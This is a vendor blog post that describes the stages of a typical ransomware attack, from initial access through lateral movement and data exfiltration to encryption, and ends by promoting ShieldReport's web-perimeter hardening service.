Ransomware headlines focus on the encryption event — the moment files become inaccessible and a ransom note appears. But encryption is the final step in a chain that typically begins days or weeks earlier. Understanding the full attack chain reveals where defences fail and why web-facing infrastructure is increasingly the initial access vector.
Phase 1: Initial Access
Modern ransomware operators don't send mass phishing emails and hope for the best. They're organized groups that acquire initial access through specialized brokers or their own reconnaissance. The top initial access vectors in 2024-2025:
- Exploiting public-facing applications: VPN appliances, web servers, and application gateways with known vulnerabilities. The MOVEit, Citrix, and Fortinet campaigns each compromised thousands of organisations through a single vulnerability.
- Compromised credentials: Valid usernames and passwords obtained from breach databases, infostealers, or purchase from access brokers. This is credential stuffing applied to corporate infrastructure.
- Web application vulnerabilities: SQL injection, deserialization flaws, and SSRF in internet-facing applications provide direct access to internal networks.
The critical insight: initial access targets whatever is publicly exposed. Your website, API, VPN portal, and email infrastructure are the perimeter that ransomware operators probe first.
Phase 2: Establishing Persistence
Once inside, the attacker's priority is survival. They install backdoors, create new accounts, and deploy remote access tools. Modern ransomware groups use legitimate system administration tools — PowerShell, WMI, PsExec, RDP — to blend in with normal traffic. This "living off the land" approach evades most endpoint detection.
Phase 3: Reconnaissance and Lateral Movement
The attacker maps the internal network, identifies domain controllers, locates backup systems, and catalogs high-value data. They move laterally using harvested credentials, pass-the-hash attacks, and exploitation of internal services that were never designed to face adversarial conditions.
This phase typically takes 3-21 days. The attacker is patient because the payoff — a complete encryption event — requires comprehensive access. Encrypting one workstation generates a small ransom; encrypting the entire domain infrastructure generates millions.
Phase 4: Data Exfiltration
Double extortion — now the dominant ransomware model — means the attacker steals data before encrypting it. If the victim restores from backups and refuses to pay, the attacker threatens to publish the stolen data. This makes backups insufficient as a ransomware defence; the data still leaks.
Exfiltration often uses legitimate cloud storage services (Mega, OneDrive, or even the victim's own cloud accounts) to avoid triggering network monitoring alerts.
Phase 5: Encryption Deployment
With maximum access and data exfiltrated, the attacker deploys the ransomware payload. Modern variants are designed for speed: parallel processing, partial file encryption (encrypting just enough of each file to make it irrecoverable), and targeting of backup systems, shadow copies, and recovery partitions.
The encryption event happens in minutes. By the time anyone notices, it's complete.
The Web-Facing Connection
The part of this chain that gets insufficient attention is initial access through web-facing infrastructure. A website leaking server version information helps attackers identify exploitable software. Missing security headers suggest a team that's under-invested in security, implying internal defences are likely weak too. Exposed admin panels, verbose error pages, and weak TLS configurations are the reconnaissance signals that access brokers catalog and sell.
ShieldReport hardens your web-facing infrastructure — the perimeter that ransomware operators probe during initial reconnaissance — so your domain doesn't signal vulnerability to automated scanning tools.